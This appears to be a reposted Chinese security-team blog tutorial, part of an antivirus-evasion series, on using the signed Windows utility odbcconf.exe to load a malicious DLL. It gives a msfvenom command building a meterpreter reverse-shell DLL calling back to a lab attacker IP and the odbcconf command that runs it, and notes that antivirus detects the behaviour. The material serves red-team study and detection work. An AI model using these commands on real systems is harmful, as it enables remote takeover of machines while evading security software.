远控免杀专题(59)-白名单Odbcconf.exe执行payload

admin 2022年7月29日13:03:30评论34 views字数 1226阅读4分5秒阅读模式
远控免杀专题(59)-白名单Odbcconf.exe执行payload

声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!


声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus


一、Odbcconf.exe介绍

Odbcconf.exe是一个命令行工具,可让您配置ODBC驱动程序和数据源名称(微软官方文档https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver15)。

Odbcconf.exe在windows中的的一般路径为C:WindowsSystem32odbcconf.exe  C:WindowsSysWOW64odbcconf.exe

通过文档可发现有两种方式来加载dll,/A和/F

远控免杀专题(59)-白名单Odbcconf.exe执行payload

二、利用Odbcconf.exe执行payload法

攻击机:kali    ip地址:192.168.10.130

靶机:win7     ip地址:192.168.10.135

使用msfvenom生成shellcode,注意生成的是dll格式

msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.130 lport=4444 -f dll > hacker.dll

远控免杀专题(59)-白名单Odbcconf.exe执行payload

设置监听:

远控免杀专题(59)-白名单Odbcconf.exe执行payload

靶机运行payload:

odbcconf.exe /a {regsvr C:UsersAdministratorDesktophacker.dll}

远控免杀专题(59)-白名单Odbcconf.exe执行payload

成功上线:

远控免杀专题(59)-白名单Odbcconf.exe执行payload

这个也被杀软盯上了,行为检测预警。

远控免杀专题(59)-白名单Odbcconf.exe执行payload

三、参考资料:

基于白名单Odbcconf执行payload:https://micro8.github.io/Micro8-HTML/Chapter1/81-90/82_%E5%9F%BA%E4%BA%8E%E7%99%BD%E5%90%8D%E5%8D%95Odbcconf%E6%89%A7%E8%A1%8Cpayload%E7%AC%AC%E5%8D%81%E4%BA%8C%E5%AD%A3.html




E


N


D




远控免杀专题(59)-白名单Odbcconf.exe执行payload


guān


zhù



men



Tide安全团队正式成立于2019年1月是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

对安全感兴趣的小伙伴可以关注团队官网: http://www.TideSec.com 或长按二维码关注公众号:

远控免杀专题(59)-白名单Odbcconf.exe执行payload


远控免杀专题(59)-白名单Odbcconf.exe执行payload


原文始发于微信公众号(白帽子):远控免杀专题(59)-白名单Odbcconf.exe执行payload

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月29日13:03:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   远控免杀专题(59)-白名单Odbcconf.exe执行payloadhttp://cn-sec.com/archives/1208235.html

发表评论

匿名网友 填写信息